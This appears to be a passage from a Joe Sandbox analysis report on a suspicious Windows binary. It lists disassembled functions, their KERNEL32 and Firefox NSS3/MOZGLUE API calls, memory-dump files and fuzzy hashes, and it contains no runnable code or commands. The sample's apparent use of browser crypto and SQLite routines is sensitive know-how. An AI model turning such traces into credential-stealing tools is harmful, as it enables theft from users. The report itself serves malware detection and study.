Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: c1927ffba4757c2c5bbfdfb2f0933240ab7571a99e493870ddfd4257688abb22
Instruction ID: 41cfa314c32ba64af471732ed692b86f3d672a779af268c527e2c388ff641b51
Opcode Fuzzy Hash: c1927ffba4757c2c5bbfdfb2f0933240ab7571a99e493870ddfd4257688abb22
Instruction Fuzzy Hash: 06716771A0271ACBDB10CF5AC980E99B7F4BF89718F25816ED9596B701D770E902CF90

Function 0062D403 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0062D450
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0062D488

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: 346cdfda406f810c833cfe01f9149160730d2c07726515bf49f952305d9e218f
Instruction ID: a433556b5a80ae662706bd4bf417d59b4e5cdfff5a0d45feb8e4a98d720ce920
Opcode Fuzzy Hash: 346cdfda406f810c833cfe01f9149160730d2c07726515bf49f952305d9e218f
Instruction Fuzzy Hash: 2131B7F0504F51AFDB309F25A884B67BAEAB715358F108B3EE19796680D374E884CF61

Function 6C3DEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C3DEDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C3DEE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C3DEECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C3DEEEB
free.MOZGLUE(?), ref: 6C3DEEF6

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: fb365ee0fceac6f51f1645c68b6f08a0d6659adc3c441bcecccd3cdd9d6a7717
Instruction ID: 4b2f46a32296d36a941a0bd883cb19813f0ad291830a54d471ba64514442d0a1
Opcode Fuzzy Hash: fb365ee0fceac6f51f1645c68b6f08a0d6659adc3c441bcecccd3cdd9d6a7717
Instruction Fuzzy Hash: 5831A4726007129BD7209E29CC44B66BBF4FB45719F160629E85E87A50E731F414CAE5

Function 6C3E1DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C3E1E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C3E1E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C3E1E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C3E1E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C3E1EAD

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: 45e7979ca9e395c1263485ebf82ad7bfe196841f7b859b8fef581c9bc987c6cd
Instruction ID: 2e70c615fe14610d6fedd423cd5f16345d4065e7dd27854d7cc4dc533c7ab0b6
Opcode Fuzzy Hash: 45e7979ca9e395c1263485ebf82ad7bfe196841f7b859b8fef581c9bc987c6cd
Instruction Fuzzy Hash: 4021B072E04224A7D700CF68DC40F9AB3A89BC8368F148639FD5957786E731D9488BE2

Function 6C3EAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C3E3FFF,00000000,?,?,?,?,?,6C3E1A1C,00000000,00000000), ref: 6C3EADA7

Part of subcall function 6C4414C0: TlsGetValue.KERNEL32 ref: 6C4414E0
Part of subcall function 6C4414C0: EnterCriticalSection.KERNEL32 ref: 6C4414F5
Part of subcall function 6C4414C0: PR_Unlock.NSS3 ref: 6C44150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C3E3FFF,00000000,?,?,?,?,?,6C3E1A1C,00000000,00000000), ref: 6C3EADB4

Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C4410F3
Part of subcall function 6C4410C0: EnterCriticalSection.KERNEL32(?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44110C
Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441141
Part of subcall function 6C4410C0: PR_Unlock.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441182
Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C3E3FFF,?,?,?,?,6C3E3FFF,00000000,?,?,?,?,?,6C3E1A1C,00000000), ref: 6C3EADD5

Part of subcall function 6C43FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C438D2D,?,00000000,?), ref: 6C43FB85
Part of subcall function 6C43FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C43FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C5094B0,?,?,?,?,?,?,?,?,6C3E3FFF,00000000,?), ref: 6C3EADEC

Part of subcall function 6C43B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5118D0,?), ref: 6C43B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3E3FFF), ref: 6C3EAE3C

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 48983a47535751d4e7f78303c13674a5a51b0758cb083ccb370dfcf58b09cc01
Instruction ID: e99cd65ac57303c978d7cdc04ec273e25aa481d1be640bd47b34fde9c704eb77
Opcode Fuzzy Hash: 48983a47535751d4e7f78303c13674a5a51b0758cb083ccb370dfcf58b09cc01
Instruction Fuzzy Hash: E8115671E002285BF7109A659C40FBF77B8DF9924CF00822EEC1996741FB61E95887E2

Function 00636F93 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00636FA1
_free.LIBCMT ref: 00636FB4

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: _freemalloc
String ID:
API String ID: 3576935931-0
Opcode ID: 377924f3c197df86858d4f9c7df6f0e1cd5375fa9e180fbb3cdbe0fa3fbedaad
Instruction ID: 95b30463aa7df672de694547e3522441e6c4cc00de10408cf6b08b3c9ffa2d9f
Opcode Fuzzy Hash: 377924f3c197df86858d4f9c7df6f0e1cd5375fa9e180fbb3cdbe0fa3fbedaad
Instruction Fuzzy Hash: C111C876808610EBDF356F74EC0469E3A979B423F0F20852DF8499B250EF71898086D4

Function 6C40CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C421E10: TlsGetValue.KERNEL32 ref: 6C421E36
Part of subcall function 6C421E10: EnterCriticalSection.KERNEL32(?,?,?,6C3FB1EE,2404110F,?,?), ref: 6C421E4B
Part of subcall function 6C421E10: PR_Unlock.NSS3 ref: 6C421E76

free.MOZGLUE(?,6C40D079,00000000,00000001), ref: 6C40CDA5
PK11_FreeSymKey.NSS3(?,6C40D079,00000000,00000001), ref: 6C40CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C40D079,00000000,00000001), ref: 6C40CDCF
DeleteCriticalSection.KERNEL32(?,6C40D079,00000000,00000001), ref: 6C40CDE2
free.MOZGLUE(?), ref: 6C40CDE9

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 6d3a015bdfee3af436c828da1036fa068ca5ecb8c8e53453256460e4ea0366fd
Instruction ID: d5c60ac018fc27b593508fbcecf0b5f1fc872890eebd794a70f0dbd1de500c7a
Opcode Fuzzy Hash: 6d3a015bdfee3af436c828da1036fa068ca5ecb8c8e53453256460e4ea0366fd
Instruction Fuzzy Hash: 9011A0B2B01125ABEB00EB65EC45D9AB76DFF0425A7100131E909C7F01E732F424D7E2

Function 6C472CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C475B40: PR_GetIdentitiesLayer.NSS3 ref: 6C475B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C472CEC

Part of subcall function 6C48C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C48C2BF

PR_EnterMonitor.NSS3(?), ref: 6C472D02
PR_EnterMonitor.NSS3(?), ref: 6C472D1F
PR_ExitMonitor.NSS3(?), ref: 6C472D42
PR_ExitMonitor.NSS3(?), ref: 6C472D5B

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: c6626f2c930e0cb11524121458bd10a5eb4e0a01ff3b538a156c55003bc12dc7
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: BE01A5B19042009FE631DE66FC40EC7B7A1EB55398F004529E95986710DA33E51586E2

Function 6C472D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C475B40: PR_GetIdentitiesLayer.NSS3 ref: 6C475B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C472D9C

Part of subcall function 6C48C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C48C2BF

PR_EnterMonitor.NSS3(?), ref: 6C472DB2
PR_EnterMonitor.NSS3(?), ref: 6C472DCF
PR_ExitMonitor.NSS3(?), ref: 6C472DF2
PR_ExitMonitor.NSS3(?), ref: 6C472E0B

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: 137599cf07df5035a895ac4826f05ee0c3011e9b30ce648efe879b79bcd8a51d
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: F301A5B19042009FE630DE65FC01FC7B7B1EB51358F000539E95996B10DA33E81686E2

Function 6C4FBDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C4F7AFE,?,?,?,?,?,?,?,?,6C4F798A), ref: 6C4FBDC3
free.MOZGLUE(?,?,6C4F7AFE,?,?,?,?,?,?,?,?,6C4F798A), ref: 6C4FBDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C4F7AFE,?,?,?,?,?,?,?,?,6C4F798A), ref: 6C4FBDE9
free.MOZGLUE(?,00000000,00000000,?,6C4F7AFE,?,?,?,?,?,?,?,?,6C4F798A), ref: 6C4FBE21
free.MOZGLUE(00000000,00000000,?,6C4F7AFE,?,?,?,?,?,?,?,?,6C4F798A), ref: 6C4FBE32

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: f08ab19c498e65d8eb8aba21fcbe9b6dd30fce891ab6873c3eda7a92dab0e156
Instruction ID: d1683398cce9ac96c7c327c37cfa1fd3a04c9536ef37d5dfc635e35c923d33ce
Opcode Fuzzy Hash: f08ab19c498e65d8eb8aba21fcbe9b6dd30fce891ab6873c3eda7a92dab0e156
Instruction Fuzzy Hash: E611E6B5B012209FDB10EF69CC09A063BF5EB4A35AB468025D51EC7710E731A415CB99

Function 6C4F7C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6C4F7C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4F7C83
malloc.MOZGLUE(00000001), ref: 6C4F7C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C4F7C9F
PR_GetCurrentThread.NSS3 ref: 6C4F7CAD

Part of subcall function 6C4A9BF0: TlsGetValue.KERNEL32(?,?,?,6C4F0A75), ref: 6C4A9C07

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: 7fe8518e727db49fd575f651f07d6ad0501d57a142927d788afadd943be299d4
Instruction ID: 8b224dbefdff29e84a32bc453260ca46a0b583b140323c541459c2e06eacd7c3
Opcode Fuzzy Hash: 7fe8518e727db49fd575f651f07d6ad0501d57a142927d788afadd943be299d4
Instruction Fuzzy Hash: F1F022B19102066BEB00DF7A9C08D473B98EF80266B018039E81CC3B00E735E016CAE6

Function 6C4FADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C4FA6D8), ref: 6C4FAE0D
free.MOZGLUE(?), ref: 6C4FAE14
DeleteCriticalSection.KERNEL32(6C4FA6D8), ref: 6C4FAE36
free.MOZGLUE(?), ref: 6C4FAE3D
free.MOZGLUE(00000000,00000000,?,?,6C4FA6D8), ref: 6C4FAE47

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 8bc1d18db85868dc9a56314f0f8d5c9feca281b43c2549d005648ff72a0ac12e
Instruction ID: 1c392815c2e2936c4535bbbdec1a35e0e0106d98beddb30ff869669b11c09c8e
Opcode Fuzzy Hash: 8bc1d18db85868dc9a56314f0f8d5c9feca281b43c2549d005648ff72a0ac12e
Instruction Fuzzy Hash: 80F0C276201A15ABCA21DF689808D1B7778FE866757110328E53E87B40E731F016D7D9

Function 00637F99 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00637FA5

Part of subcall function 006361D4: __getptd_noexit.LIBCMT ref: 006361D7
Part of subcall function 006361D4: __amsg_exit.LIBCMT ref: 006361E4

__getptd.LIBCMT ref: 00637FBC
__amsg_exit.LIBCMT ref: 00637FCA
__lock.LIBCMT ref: 00637FDA
__updatetlocinfoEx_nolock.LIBCMT ref: 00637FEE

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e87cfb2b0fec2a38aaf76eedb9f54acb64b777233a1aae7e5ff646e698b50365
Instruction ID: 1bc3d822a134b62bfaed26cc022cbee24172abf78ebdc2a9f9542a73e07d67f0
Opcode Fuzzy Hash: e87cfb2b0fec2a38aaf76eedb9f54acb64b777233a1aae7e5ff646e698b50365
Instruction Fuzzy Hash: 79F090B2948B209BD7B4BB68980279D76A3BF00720F11459DF405A72E2DB245940EBED

Function 6C37BCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(6C51AAF9,?), ref: 6C37BE37

Strings

Ol, xrefs: 6C37BDD7
winFileSize, xrefs: 6C37BF07
POl, xrefs: 6C37BED4

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: sqlite3_mprintf
String ID: Ol$POl$winFileSize
API String ID: 4246442610-3746748800
Opcode ID: 773cd4a262adce3e3fa471de8f6d5bdf09d3577efd6d2a094be15519cc97f2ce
Instruction ID: 51eb2e1daeeb705afe95e2fcbb2f53ecd450f2cf241cac4ca725bdec54ba5454
Opcode Fuzzy Hash: 773cd4a262adce3e3fa471de8f6d5bdf09d3577efd6d2a094be15519cc97f2ce
Instruction Fuzzy Hash: 6E618D31A04605DFDB24CF28D980AAAB7F5FF4630CB054665D8198FB40E738E8558FE9

Function 6C387C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C387D35

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C387D13, 6C387D1F, 6C387D47, 6C387D53, 6C387D5F
database corruption, xrefs: 6C387D29
%s at line %d of [%.10s], xrefs: 6C387D2E

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
